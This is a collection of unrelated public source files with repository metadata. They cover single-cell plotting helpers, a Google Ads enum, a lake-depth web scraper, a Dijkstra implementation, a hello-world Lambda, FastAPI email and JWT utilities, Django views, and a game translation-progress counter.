'x': f'{method}1',
'y': f'{method}2'
},
title=adata.uns['dataset'] if show_title else None,
template='none'
)
if return_fig:
return fig
fig.show()
def _plot_gene(
adata: AnnData,
gene: Optional[Union[str, int]] = None,
show_title: Optional[bool] = False,
return_fig: Optional[bool] = False
) -> Figure:
"""
Helper function for plot.
"""
if gene is None:
raise ValueError("Please specify gene to plot.")
index = _find_gene_index(adata, gene)
if index == -1:
print("Gene not found.")
return
color = adata.X[:, index]
method = adata.uns['visualization_info_2d']['method']
fig = px.scatter(
x=adata.obsm['x_emb_2d'][:, 0],
y=adata.obsm['x_emb_2d'][:, 1],
color=color,
hover_data={'Cell': adata.obs.index.to_numpy()},
labels={
'x': f'{method}1',
'y': f'{method}2'
},
title=adata.uns['dataset'] if show_title else None,
template='none'
)
if return_fig:
return fig
fig.show()
def _plot_scores(
adata: AnnData,
show_title: Optional[bool] = False,
return_fig: Optional[bool] = False
) -> Figure:
"""
Helper function for plot.
"""
if 'scores' not in adata.uns['cluster_info']:
raise ValueError("Scores not found in object.")
eval_method = adata.uns['cluster_info']['eval_method']
fig = px.line(
x=adata.uns['cluster_info']['n_clusters_used'],
y=adata.uns['cluster_info']['scores'],
labels={
'x': 'n_clusters',
'y': f'{eval_method} score'
},
title=adata.uns['dataset'] if show_title else None,
template='none'
)
if return_fig:
return_fig
fig.show()
def plot(
x: AnnData,
by: Optional[str] = None,
gene: Optional[Union[str, int]] = None,
show_title: Optional[bool] = False,
return_fig: Optional[bool] = False
) -> None:
"""
Plotting functionality.
Parameters
__________
x: AnnData object containing the data matrix and the plot keys.
by: String specifying what to plot.
gene: Will be used only if by is None or by == 'gene'.
Specify the name of the gene for which to plot expression for.
Can be in ensembl format, gene name, or index. If name is
specified and names are not found in adata, then will run
name_genes, but will not save the names in the adata object.
show_title: Boolean specifying whether to show the name of the
dataset in the plot.
return_fig: Boolean specifying whether to return a fig object if
set to True, otherwise will plot immediately.
"""
# Validations
is_AnnData = isinstance(x, AnnData)
if not is_AnnData:
raise ValueError("Object not in AnnData format.")
if by == 'labels' or (by is None and gene is None):
return _plot_labels(x, show_title, return_fig)
elif by is None or by == 'gene':
return _plot_gene(x, gene, show_title, return_fig)
elif by == 'scores':
return _plot_scores(x, show_title, return_fig)
|
[
"euxhen_hasanaj@ymail.com"
] |
euxhen_hasanaj@ymail.com
|
444fd3d4ecdaaf0e9ceab752d1b0931729f02bbe
|
245b92f4140f30e26313bfb3b2e47ed1871a5b83
|
/airflow/providers/google_vendor/googleads/v12/errors/types/campaign_feed_error.py
|
7a1cbbf42dce80b65a8b1c81159737e23be143fb
|
[
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] |
permissive
|
ephraimbuddy/airflow
|
238d6170a0e4f76456f00423124a260527960710
|
3193857376bc2c8cd2eb133017be1e8cbcaa8405
|
refs/heads/main
| 2023-05-29T05:37:44.992278
| 2023-05-13T19:49:43
| 2023-05-13T19:49:43
| 245,751,695
| 2
| 1
|
Apache-2.0
| 2021-05-20T08:10:14
| 2020-03-08T04:28:27
| null |
UTF-8
|
Python
| false
| false
| 1,509
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="airflow.providers.google_vendor.googleads.v12.errors",
marshal="google.ads.googleads.v12",
manifest={"CampaignFeedErrorEnum",},
)
class CampaignFeedErrorEnum(proto.Message):
r"""Container for enum describing possible campaign feed errors.
"""
class CampaignFeedError(proto.Enum):
r"""Enum describing possible campaign feed errors."""
UNSPECIFIED = 0
UNKNOWN = 1
FEED_ALREADY_EXISTS_FOR_PLACEHOLDER_TYPE = 2
CANNOT_CREATE_FOR_REMOVED_FEED = 4
CANNOT_CREATE_ALREADY_EXISTING_CAMPAIGN_FEED = 5
CANNOT_MODIFY_REMOVED_CAMPAIGN_FEED = 6
INVALID_PLACEHOLDER_TYPE = 7
MISSING_FEEDMAPPING_FOR_PLACEHOLDER_TYPE = 8
NO_EXISTING_LOCATION_CUSTOMER_FEED = 9
LEGACY_FEED_TYPE_READ_ONLY = 10
__all__ = tuple(sorted(__protobuf__.manifest))
|
[
"noreply@github.com"
] |
ephraimbuddy.noreply@github.com
|
505d970dbb3fbfed63db57de304445fbdbfe37c9
|
5d24987bce37f5e5ae60a4f550d0b5723ebe7718
|
/Preparing data/odata_download.py
|
1dd62c7c0425686f3392f16d70f405b6a10739ee
|
[] |
no_license
|
saraheikonen/eutrophication-drivers
|
53e3c8138e4663cd0df1a54a47ee1a6b759ec652
|
fadc7e08252ff9d144aea768c7f4a1153e479762
|
refs/heads/main
| 2023-04-14T09:10:13.728341
| 2022-07-13T11:21:06
| 2022-07-13T11:21:06
| 504,433,294
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,255
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Fri Jun 18 13:11:46 2021
@author: sarah
"""
from selenium import webdriver
from selenium.webdriver.support.ui import Select
import geopandas as gpd
import numpy as np
import os
# give paths to catchment shapefile (basins_path), to chromedriver.exe and where
# to save catchments with depth
basins_path = 'Y:/Dippa/Data/model_input/basins/lake_catchments'
chromedriver_path = chromedriver_path = 'Y:/Dippa/Koodi local/Download data/chromedriver'
save_path = 'Y:/Dippa/Data/basins/lake_catchments_with_depth'
# if save path doesn't exist, create folder
if not os.path.exists(save_path):
os.makedirs(save_path)
def build_query(short_id, driver):
# open jarvirajapinta querybuilder
jarviapi_url = 'http://rajapinnat.ymparisto.fi/api/jarvirajapinta/1.0/ODataQueryBuilder/'
driver.get(jarviapi_url)
# select top 1 result from dropdown
element_top= Select(driver.find_element_by_id('top'))
element_top.select_by_value('1')
driver.implicitly_wait(5)
# select jarvi from dropdown menu
element_jarvi = Select(driver.find_element_by_id('entities'))
element_jarvi.select_by_value('0')
driver.implicitly_wait(5)
# add where-condition: short lake id
#driver.implicitly_wait(5)
driver.find_element_by_id('addCondition').click()
element_condition = Select(driver.find_element_by_class_name('property'))
element_condition.select_by_value('1')
driver.implicitly_wait(5)
# equals
element_equals = Select(driver.find_element_by_class_name('propertyFilter'))
element_equals.select_by_value('0')
driver.implicitly_wait(5)
# short id
driver.find_element_by_class_name('propertyFilterInput').send_keys(short_id)
#select columns: mean depth in meters
driver.find_element_by_id('addSelectCondition').click()
short_id = driver.find_element_by_id('selectcolumn_24')
short_id.click()
driver.implicitly_wait(5)
# search
search_button = driver.find_element_by_id('submitQuery')
search_button.click()
# get result
driver.implicitly_wait(5)
mean_depth = driver.find_element_by_xpath('/html/body/div/div[2]/table/tbody/tr/td').text
if len(mean_depth) > 0:
depth_value = float(mean_depth)
else:
depth_value = np.nan
# refresh page to start over
search_button = driver.find_element_by_id('clearQuery')
search_button.click()
return depth_value
def main(basins_path, chromedriver_path, save_path):
# prepare basins df
basins = gpd.read_file(basins_path)
# make a new field for shortened VPDTunnus
basins['VPDLyh'] = basins.apply(lambda x: x.VPDTunnus.split('_')[0], axis = 1)
# set up chromedriver
driver = webdriver.Chrome(executable_path=chromedriver_path)
# call guery function on actual df
basins.insert(5, 'mean_depth', np.nan)
basins.loc[:,'mean_depth'] = basins.apply(lambda x: build_query(x.VPDLyh, driver), axis = 1)
driver.close()
basins.to_file(save_path + '/basins_with_lake_depth.shp')
main(basins_path, chromedriver_path, save_path)
|
[
"noreply@github.com"
] |
saraheikonen.noreply@github.com
|
f9c5db59cf745e342ac21e9f1ee948e6452c7beb
|
c523eff326b8bc6c0c903bf7fe16ec3b98605bff
|
/choieungi/boj/다익스트라_우선순위큐.py
|
24bc8f468ea051c8473f4f4dbe8747fbce8c0e78
|
[] |
no_license
|
IgoAlgo/Problem-Solving
|
c76fc157c4dd2afeeb72a7e4a1833b730a0b441d
|
5cc57d532b2887cf4eec8591dafc5ef611c3c409
|
refs/heads/master
| 2023-06-26T05:12:02.449706
| 2021-07-14T06:57:00
| 2021-07-14T06:57:00
| 328,959,557
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,856
|
py
|
import heapq
import sys
input = sys.stdin.readline
INF = int(1e9) # 무한을 의미하는 값으로 10억을 설정
# 노드의 개수, 간선의 개수를 입력받기
n, m = map(int, input().split())
# 시작 노드 번호를 입력받기
start = int(input())
# 각 노드에 연결되어 있는 노드에 대한 정보를 담는 리스트를 만들기
graph = [[] for i in range(n + 1)]
# 최단 거리 테이블을 모두 무한으로 초기화
distance = [INF] * (n + 1)
# 모든 간선 정보를 입력받기
for _ in range(m):
a, b, c = map(int, input().split())
# a번 노드에서 b번 노드로 가는 비용이 c라는 의미
graph[a].append((b, c))
def dijkstra(start):
q = []
# 시작 노드로 가기 위한 최단 경로는 0으로 설정하여, 큐에 삽입
heapq.heappush(q, (0, start))
distance[start] = 0
while q: # 큐가 비어있지 않다면
# 가장 최단 거리가 짧은 노드에 대한 정보 꺼내기
dist, now = heapq.heappop(q)
# 현재 노드가 이미 처리된 적이 있는 노드라면 무시
if distance[now] < dist:
continue
# 현재 노드와 연결된 다른 인접한 노드들을 확인
for i in graph[now]:
cost = dist + i[1]
# 현재 노드를 거쳐서, 다른 노드로 이동하는 거리가 더 짧은 경우
if cost < distance[i[0]]:
distance[i[0]] = cost
heapq.heappush(q, (cost, i[0]))
# 다익스트라 알고리즘을 수행
dijkstra(start)
# 모든 노드로 가기 위한 최단 거리를 출력
for i in range(1, n + 1):
# 도달할 수 없는 경우, 무한(INFINITY)이라고 출력
if distance[i] == INF:
print("INFINITY")
# 도달할 수 있는 경우 거리를 출력
else:
print(distance[i])
|
[
"choieungi@gm.gist.ac.kr"
] |
choieungi@gm.gist.ac.kr
|
e7d869dd783dc38a75347e17f4554bba94a9bb86
|
78957a573d0554b3476698bb3c9cc07eb17e17d9
|
/amplify/backend/function/awsamplifyauthstarte960f0db4/src/index.py
|
321b1c7bfee9e77e88013a581370dac7b9090996
|
[
"MIT-0"
] |
permissive
|
BearTECH-Consulting-Inc/demo-phc-amplify-auth
|
a500275f94c512dd7b27d32e2c78553770c47181
|
e20a1e503397a3d0fe0f26d93850d5d6c1429775
|
refs/heads/main
| 2023-08-10T21:58:31.380914
| 2021-09-15T03:01:46
| 2021-09-15T03:01:46
| 406,576,487
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 380
|
py
|
import json
def handler(event, context):
print('received event:')
print(event)
return {
'statusCode': 200,
'headers': {
'Access-Control-Allow-Headers': '*',
'Access-Control-Allow-Origin': '*',
'Access-Control-Allow-Methods': 'OPTIONS,POST,GET'
},
'body': json.dumps('Hello from your new Amplify Python lambda!')
}
|
[
"cameron.hebert@opsguru.io"
] |
cameron.hebert@opsguru.io
|
18d4a948b0ca382c4d01997d274c1deb0cbccddf
|
b92226895d04b0258981864e8604720de9c09f4d
|
/src/utils.py
|
3200a377f749da6ea1b234e191737060009fa795
|
[
"BSD-3-Clause"
] |
permissive
|
aydinmemis/blog_FastAPI
|
e42a6c4f5a9c64154da0f9a23290c274b305838a
|
f584634a2cd410904df6a7d9478044d269737a91
|
refs/heads/master
| 2022-04-06T12:37:59.068303
| 2020-03-11T18:04:14
| 2020-03-11T18:04:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,688
|
py
|
import logging
from datetime import datetime, timedelta
from pathlib import Path
from typing import Optional
import emails
import jwt
from emails.template import JinjaTemplate
from jwt.exceptions import InvalidTokenError
from core import config
password_reset_jwt_subject = "preset"
def send_email(email_to: str, subject_template="", html_template="", environment={}):
assert config.EMAILS_ENABLED, "no provided configuration for email variables"
message = emails.Message(
subject=JinjaTemplate(subject_template),
html=JinjaTemplate(html_template),
mail_from=(config.EMAILS_FROM_NAME, config.EMAILS_FROM_EMAIL),
)
smtp_options = {"host": config.SMTP_HOST, "port": config.SMTP_PORT}
if config.SMTP_TLS:
smtp_options["tls"] = True
if config.SMTP_USER:
smtp_options["user"] = config.SMTP_USER
if config.SMTP_PASSWORD:
smtp_options["password"] = config.SMTP_PASSWORD
response = message.send(to=email_to, render=environment, smtp=smtp_options)
logging.info(f"send email result: {response}")
def send_test_email(email_to: str):
project_name = config.PROJECT_NAME
subject = f"{project_name} - Test email"
with open(Path(config.EMAIL_TEMPLATES_DIR) / "test_email.html") as f:
template_str = f.read()
send_email(
email_to=email_to,
subject_template=subject,
html_template=template_str,
environment={"project_name": config.PROJECT_NAME, "email": email_to},
)
def send_reset_password_email(email_to: str, email: str, token: str):
project_name = config.PROJECT_NAME
subject = f"{project_name} - Password recovery for user {email}"
with open(Path(config.EMAIL_TEMPLATES_DIR) / "reset_password.html") as f:
template_str = f.read()
if hasattr(token, "decode"):
use_token = token.decode()
else:
use_token = token
server_host = config.SERVER_HOST
link = f"{server_host}/reset-password?token={use_token}"
send_email(
email_to=email_to,
subject_template=subject,
html_template=template_str,
environment={
"project_name": config.PROJECT_NAME,
"username": email,
"email": email_to,
"valid_hours": config.EMAIL_RESET_TOKEN_EXPIRE_HOURS,
"link": link,
},
)
def send_new_account_email(email_to: str, username: str, password: str):
project_name = config.PROJECT_NAME
subject = f"{project_name} - New account for user {username}"
with open(Path(config.EMAIL_TEMPLATES_DIR) / "new_account.html") as f:
template_str = f.read()
link = config.SERVER_HOST
send_email(
email_to=email_to,
subject_template=subject,
html_template=template_str,
environment={
"project_name": config.PROJECT_NAME,
"username": username,
"password": password,
"email": email_to,
"link": link,
},
)
def generate_password_reset_token(email):
delta = timedelta(hours=config.EMAIL_RESET_TOKEN_EXPIRE_HOURS)
now = datetime.utcnow()
expires = now + delta
exp = expires.timestamp()
encoded_jwt = jwt.encode(
{"exp": exp, "nbf": now, "sub": password_reset_jwt_subject, "email": email},
config.SECRET_KEY,
algorithm="HS256",
)
return encoded_jwt
def verify_password_reset_token(token) -> Optional[str]:
try:
decoded_token = jwt.decode(token, config.SECRET_KEY, algorithms=["HS256"])
assert decoded_token["sub"] == password_reset_jwt_subject
return decoded_token["email"]
except InvalidTokenError:
return None
|
[
"socanime@gmail.com"
] |
socanime@gmail.com
|
7f394586d195a86c52647c95b64076218b61bfd6
|
395e06560c7b794a965add40c586684cb0b4e59c
|
/terrascript/ultradns/d.py
|
6fdcb1b3110014abb8abde0673bba426c6116dbf
|
[
"BSD-2-Clause",
"Python-2.0"
] |
permissive
|
alanyee/python-terrascript
|
f01edef3f6e21e5b18bc3295efef1657be17e3ca
|
e880e7650a7c3a88603d5429dafbacd28cd26c7e
|
refs/heads/develop
| 2023-03-09T07:33:32.560816
| 2020-09-21T07:11:09
| 2020-09-21T07:11:09
| 300,696,024
| 0
| 0
|
BSD-2-Clause
| 2021-02-18T00:33:30
| 2020-10-02T17:57:18
| null |
UTF-8
|
Python
| false
| false
| 28
|
py
|
# terrascript/ultradns/d.py
|
[
"ilon.sjogren@enplore.com"
] |
ilon.sjogren@enplore.com
|
b2f11b75731687ccd8e4067434d56405c463a273
|
87b4fe9df1abab807dd772b9df81bab45c5bf97b
|
/locallibrary/catalog/views.py
|
4dd8b9c656691d24048eb8763b4ab905401a3c17
|
[] |
no_license
|
KCK90/Project
|
191e0c87d6648497e9655da8700dd32654192724
|
3f734ed430a5f33d52aa4c5b2b7f31a99c4a28f5
|
refs/heads/master
| 2020-09-03T11:07:51.273842
| 2019-11-25T00:48:47
| 2019-11-25T00:48:47
| 219,449,889
| 0
| 0
| null | 2019-11-25T00:48:48
| 2019-11-04T08:15:10
|
Python
|
UTF-8
|
Python
| false
| false
| 916
|
py
|
from django.shortcuts import render
import csv
import pandas as pd
# Create your views here.
def post_list(request):
return render(request, 'post_list.html', {})
def koty(request):
print('About')
return render(request, 'koty.html', {})
def analiza(request):
return render(request, 'analiza.html', {})
def zdj(request):
original = cv2.imread("dog.jpg")
duplicate = cv2.imread("images/dog2.jpg")
if original.shape == duplicate.shape:
print("The images have same size and channels")
difference = cv2.subtract(original, duplicate)
b, g, r = cv2.split(difference)
if cv2.countNonZero(b) == 0 and cv2.countNonZero(g) == 0 and cv2.countNonZero(r) == 0:
print("The images are completely Equal")
cv2.imshow("Original", original)
cv2.imshow("Duplicate", duplicate)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
[
"noreply@github.com"
] |
KCK90.noreply@github.com
|
f59676ae9eac334e4b46372346f1f0b0d5844c4e
|
c60c199410289c1d7ec4aea00833b461e1f08f88
|
/27-29-nov-2014/day1/stringiter2.py
|
027138065a5897ed5823bf0d6c686f23c0a0f2de
|
[] |
no_license
|
ver007/pythonjumpstart
|
66fb111e6af197fad3e853b2c2d712a1b57a7d59
|
5b1f52479abd07456e2da494149e491d398f3b7d
|
refs/heads/master
| 2021-01-21T01:34:35.501870
| 2015-05-13T14:10:13
| 2015-05-13T14:10:13
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 95
|
py
|
__author__ = 'ravi'
s = 'aeiou'
i = 1
for char in s:
print "{}".format(char*i)
i += 1
|
[
"ravi@rootcap.in"
] |
ravi@rootcap.in
|
ab71c633041e9986b2c5cc1c8215e65f32c791a3
|
4db0fb43c3aacfb56619c91c21508fcccc5fc158
|
/Translation-stats/Translation-stats.py
|
484fd134f54e7c2ed8a0a05458e8038ba4a0d513
|
[] |
no_license
|
xuchkang171/BoD-Translation-Zh
|
10913c5c1b06b6715ee32c59e7553c564886bf02
|
baa421441e08fc0b6991f14449e010862b382d1f
|
refs/heads/master
| 2021-08-28T08:16:41.371836
| 2017-10-29T08:48:53
| 2017-10-29T08:48:53
| 107,788,086
| 0
| 1
| null | 2017-12-11T17:18:06
| 2017-10-21T14:41:29
|
Python
|
UTF-8
|
Python
| false
| false
| 4,819
|
py
|
import re, os, io
# Revise following two defines (language_code and r2g_path) before you start using this program.
# Two-letter codes, represents the target language of translation you're working on.
language_code = "zh" # Check https://en.wikipedia.org/wiki/List_of_ISO_639-1_codes for yours.
# Path of your R2G folder (WITHOUT A BACKSLASH AT THE END)
# r2g_path = r"G:\SteamLibrary\steamapps\common\Return 2 Games"
r2g_path = os.path.abspath(os.path.join(os.getcwd(), os.pardir)) # In this way, this file should lies in subfolder
# of Return 2 Games folder.
launcher_path = r2g_path + r"\lang_{}\launcher.utf8".format(language_code)
main_path = r2g_path + r"\bod_lang_{}_demo\bod_demo_main.utf8".format(language_code)
cards_path = r2g_path + r"\bod_lang_{}_demo\bod_demo_cards.utf8".format(language_code)
gossips_path = r2g_path + r"\bod_lang_{}_demo\bod_demo_gossips.utf8".format(language_code)
# translated_units: load ignore items from ignore.txt
def load_ignores_for(translated_units):
with open(r"ignore.txt") as f:
all_text = f.read().split("\n")
for index, line in enumerate(all_text):
if line.startswith("# "):
pass
elif not line:
pass
else:
translated_units.setdefault(index, re.escape(line))
return translated_units
script_line_re = r"^\w+\s*=\s*\"(.*?)(?<!\\)\"\s*(#.*)?"
# Made for simplified chinese and traditional chinese. Revise it if you're working on a translation for other language.
translated_units = {"wide character" : r"[^\x00-\xff]", # Contains all Chinese characters.
"color_mark_begin" : r"\\\^[a-zA-Z0-9]{6}",
"color_mark_end" : r"\\\^\^",
"foo_1" : r"\\m\d\.\d",
"space" : r"\s",
"icon_mark" : r"\\s[a-zA-Z]*[0-9]*[<>?:;=`]?",
"several characters" : r"[/+-=,.:?!>_%~()]|\\\"",
"carriage return mark" : r"\\n",
"variable mark" : r"\\\d",
"digit" : r"\d",
"empty" : r""}
translated_units = load_ignores_for(translated_units)
translated_text_re = "^({})+$".format("|".join(x for x in translated_units.values()))
print(translated_text_re)
s = re.compile(script_line_re)
t = re.compile(translated_text_re)
ignore_string_mark = "# Translator: Translated."
ignore = re.compile(re.escape(ignore_string_mark))
print("ignore = ", ignore)
translation_items_count_summary = 0
translated_items_count_summary = 0
file_log = ""
log = ""
def save_file_log(filename, content):
with io.open(filename, 'w', encoding='utf8') as f:
f.write(content)
for x in (launcher_path, main_path, cards_path, gossips_path):
print(x)
with open(x, encoding='utf-8') as f:
plain_text = f.read()
all_text = plain_text.split("\n")
file_log = list(all_text)
translation_items_count_in_file = 0
translated_items_count_in_file = 0
for index, line in enumerate(all_text):
script = ""
result = s.match(line)
try:
script = result.group(1)
except (IndexError, AttributeError):
file_log[index] = " " + file_log[index]
continue
translation_items_count_in_file += 1
if ignore.search(line) or t.match(script):
translated_items_count_in_file += 1
file_log[index] = "T " + file_log[index]
else:
file_log[index] = "N " + file_log[index]
print(script)
translated_items_count_in_file += len(re.findall(ignore_string_mark, plain_text))
log += "* {}: {}% ({}/{})\n".format(re.search(r"(?<=\\)\w*\\\w*\.utf8", x).group(0),
round(translated_items_count_in_file / \
translation_items_count_in_file * 100),
translated_items_count_in_file,
translation_items_count_in_file)
translation_items_count_summary += translation_items_count_in_file
translated_items_count_summary += translated_items_count_in_file
save_file_log(x + ".log", '\n'.join(file_log))
summary = "* Overall progress: {}% ({}/{})\n".format(
round(translated_items_count_summary / translation_items_count_summary * 100),
translated_items_count_summary, translation_items_count_summary)
log = summary + log
f = open('Progress.txt', 'w')
f.write(log)
f.close()
os.startfile("Progress.txt")
|
[
"xuchkang171@gmail.com"
] |
xuchkang171@gmail.com
|
8dcb937ae42edefdcbf4daffa1f87a7d8005a663
|
66137e154dbe9b9f1d4056dd2cc06daedf2d27fe
|
/acs/acs_ygh_occupied_households_lacking_plumbing/static.py
|
e3c6298668e3537d2584f0f9d02f836b1eb831dd
|
[] |
no_license
|
domsmo/datausa-acs-bamboo-etl
|
edb90504b2418e3ef2c1574cd270a5b54122a1d7
|
07cca23a9003719b1d8bc07c3c417253d68c9ba6
|
refs/heads/main
| 2023-08-31T23:20:56.598074
| 2021-10-23T07:40:14
| 2021-10-23T07:40:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 129
|
py
|
DICT_RENAME = {
'B25048_002E': 'mea-0',
'B25048_003E': 'mea-1',
'B25048_002M': 'moe-0',
'B25048_003M': 'moe-1',
}
|
[
"jelmyhermosilla@MacBook-Pro-de-jelmy.local"
] |
jelmyhermosilla@MacBook-Pro-de-jelmy.local
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.